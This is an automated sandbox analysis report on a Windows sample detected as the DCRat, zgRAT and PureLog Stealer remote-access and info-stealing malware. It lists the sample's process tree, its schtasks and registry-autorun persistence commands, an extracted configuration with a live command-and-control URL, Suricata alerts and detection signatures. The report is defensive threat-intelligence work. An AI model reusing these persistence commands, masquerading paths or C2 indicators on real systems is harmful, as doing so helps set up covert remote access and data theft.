Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
t8F7Ic986c.exe

Overview

General Information

Sample name:t8F7Ic986c.exe
renamed because original name is a hash value
Original sample name:a4923d4db3234b3905ad3097cc03af46.exe
Analysis ID:1583176
MD5:a4923d4db3234b3905ad3097cc03af46
SHA1:3e12ad372643b3c9d91053b91f61f8cd7e42118c
SHA256:4685860269353c0eaaec2e5da79cb35a475123a37fa6d77c4faf345840da2a10
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Found pyInstaller with non standard icon
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • t8F7Ic986c.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\t8F7Ic986c.exe" MD5: A4923D4DB3234B3905AD3097CC03AF46)
    • t8F7Ic986c.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\t8F7Ic986c.exe" MD5: A4923D4DB3234B3905AD3097CC03AF46)
      • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BoosterX.exe (PID: 7592 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234 MD5: B0A28FF93B030B10FD70698A5A7C27D0)
          • cmd.exe (PID: 7688 cmdline: C:\Windows\system32\cmd.exe /c ""C:\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Chaindriver.sfx.exe (PID: 7732 cmdline: Chaindriver.sfx.exe -p1234 MD5: 9E935AF26F27628601A2A336CA24AEF2)
              • Chaindriver.exe (PID: 7852 cmdline: "C:\Chaindriver.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
                • schtasks.exe (PID: 7924 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7948 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 12 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • csc.exe (PID: 7988 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                  • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • cvtres.exe (PID: 8040 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
                • schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8088 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8112 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8160 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7100 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7228 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7272 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 7296 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 5 /tr "'C:\Recovery\Memory Compression.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 4348 cmdline: schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 3492 cmdline: schtasks.exe /create /tn "Chaindriver" /sc ONLOGON /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • schtasks.exe (PID: 5016 cmdline: schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • cmd.exe (PID: 3192 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 908 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 5960 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • Chaindriver.exe (PID: 7712 cmdline: "C:\Chaindriver.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Chaindriver.exe (PID: 2336 cmdline: C:\Chaindriver.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Chaindriver.exe (PID: 2256 cmdline: C:\Chaindriver.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Memory Compression.exe (PID: 2704 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • Memory Compression.exe (PID: 6924 cmdline: "C:\Recovery\Memory Compression.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
    • cmd.exe (PID: 7840 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7216 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7936 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • NOFqHeDosUIopsPGLT.exe (PID: 7316 cmdline: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • NOFqHeDosUIopsPGLT.exe (PID: 7496 cmdline: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • NOFqHeDosUIopsPGLT.exe (PID: 7976 cmdline: "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe" MD5: 64F81209BCCE8D36D800FEEC26D75990)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://797441cm.n9shteam2.top/Videouploads", "MUTEX": "DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Recovery\Memory Compression.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Recovery\Memory Compression.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Recovery\NOFqHeDosUIopsPGLT.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\NOFqHeDosUIopsPGLT.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Recovery\NOFqHeDosUIopsPGLT.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 5 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  Process Memory Space: Chaindriver.exe PID: 7852JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: Memory Compression.exe PID: 6924JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 1 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      8.0.Chaindriver.exe.660000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        8.0.Chaindriver.exe.660000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Execution from Suspicious Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, CommandLine: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, NewProcessName: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, OriginalFileName: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe, ProcessId: 7316, ProcessName: NOFqHeDosUIopsPGLT.exe
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetFilename: C:\Users\Default\Pictures\RuntimeBroker.exe
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Pictures\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\NOFqHeDosUIopsPGLT.exe", EventID: 13, EventType: SetValue, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NOFqHeDosUIopsPGLT
                          Sigma detected: CurrentVersion NT Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\NOFqHeDosUIopsPGLT.exe", EventID: 13, EventType: SetValue, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", ProcessId: 7988, ProcessName: csc.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f, CommandLine: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f, ProcessId: 8064, ProcessName: schtasks.exe
                          Sigma detected: Dynamic CSharp Compile Artefact
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Chaindriver.exe, ProcessId: 7852, TargetFilename: C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline

                          Data Obfuscation

                          barindex
                          Sigma detected: Dot net compiler compiles file from suspicious location
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline", ProcessId: 7988, ProcessName: csc.exe

                          Persistence and Installation Behavior

                          barindex
                          Sigma detected: Schedule system process
                          Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Chaindriver.exe" , ParentImage: C:\Chaindriver.exe, ParentProcessId: 7852, ParentProcessName: Chaindriver.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f, ProcessId: 7100, ProcessName: schtasks.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-02T07:42:12.937028+010020480951A Network Trojan was detected192.168.2.449730185.158.202.5280TCP
                          2025-01-02T07:42:40.718432+010020480951A Network Trojan was detected192.168.2.449737185.158.202.5280TCP
                          2025-01-02T07:42:47.937085+010020480951A Network Trojan was detected192.168.2.449738185.158.202.5280TCP
                          2025-01-02T07:42:57.077732+010020480951A Network Trojan was detected192.168.2.449740185.158.202.5280TCP
                          2025-01-02T07:43:05.374608+010020480951A Network Trojan was detected192.168.2.449788185.158.202.5280TCP
                          2025-01-02T07:43:08.640348+010020480951A Network Trojan was detected192.168.2.449809185.158.202.5280TCP
                          2025-01-02T07:43:10.452741+010020480951A Network Trojan was detected192.168.2.449820185.158.202.5280TCP
                          2025-01-02T07:43:13.468391+010020480951A Network Trojan was detected192.168.2.449841185.158.202.5280TCP
                          2025-01-02T07:43:15.952759+010020480951A Network Trojan was detected192.168.2.449859185.158.202.5280TCP
                          2025-01-02T07:43:37.905923+010020480951A Network Trojan was detected192.168.2.449995185.158.202.5280TCP
                          2025-01-02T07:43:46.015323+010020480951A Network Trojan was detected192.168.2.450013185.158.202.5280TCP
                          2025-01-02T07:43:49.327933+010020480951A Network Trojan was detected192.168.2.450014185.158.202.5280TCP
                          2025-01-02T07:43:52.952838+010020480951A Network Trojan was detected192.168.2.450015185.158.202.5280TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: t8F7Ic986c.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://797441cm.n9shteam2.topAvira URL Cloud: Label: malware
                          Source: http://797441cm.n9shteam2.top/Videouploads.phpAvira URL Cloud: Label: malware
                          Source: http://797441cm.n9shteam2.top/Avira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Recovery\NOFqHeDosUIopsPGLT.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Recovery\Memory Compression.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\KGIrVxyv.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\Users\user\Desktop\TkRgFrOc.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Chaindriver.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\Default\Pictures\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeAvira: detection malicious, Label: TR/AVI.Agent.denui
                          Source: C:\Recovery\NOFqHeDosUIopsPGLT.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\PxTXHLsG.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Found malware configuration
                          Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://797441cm.n9shteam2.top/Videouploads", "MUTEX": "DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Chaindriver.exeReversingLabs: Detection: 69%
                          Source: C:\Chaindriver.sfx.exeReversingLabs: Detection: 18%
                          Source: C:\Recovery\Memory Compression.exeReversingLabs: Detection: 69%
                          Source: C:\Recovery\NOFqHeDosUIopsPGLT.exeReversingLabs: Detection: 69%
                          Source: C:\Users\Default\Pictures\RuntimeBroker.exeReversingLabs: Detection: 69%
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeReversingLabs: Detection: 69%
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeReversingLabs: Detection: 56%
                          Source: C:\Users\user\Desktop\FnBzuKhI.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\KGIrVxyv.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\PxTXHLsG.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\TkRgFrOc.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\Zfmnrnxn.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\viEjRGTv.logReversingLabs: Detection: 25%
                          Multi AV Scanner detection for submitted file
                          Source: t8F7Ic986c.exeReversingLabs: Detection: 47%
                          Source: t8F7Ic986c.exeVirustotal: Detection: 61%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
                          Machine Learning detection for dropped file
                          Source: C:\Recovery\NOFqHeDosUIopsPGLT.exeJoe Sandbox ML: detected
                          Source: C:\Recovery\Memory Compression.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\HTKiXRcY.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\BXpblVtN.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\TkRgFrOc.logJoe Sandbox ML: detected
                          Source: C:\Chaindriver.exeJoe Sandbox ML: detected
                          Source: C:\Users\Default\Pictures\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Recovery\NOFqHeDosUIopsPGLT.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                          Source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://797441cm.n9shteam2.top/","Videouploads"]]
                          Source: t8F7Ic986c.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
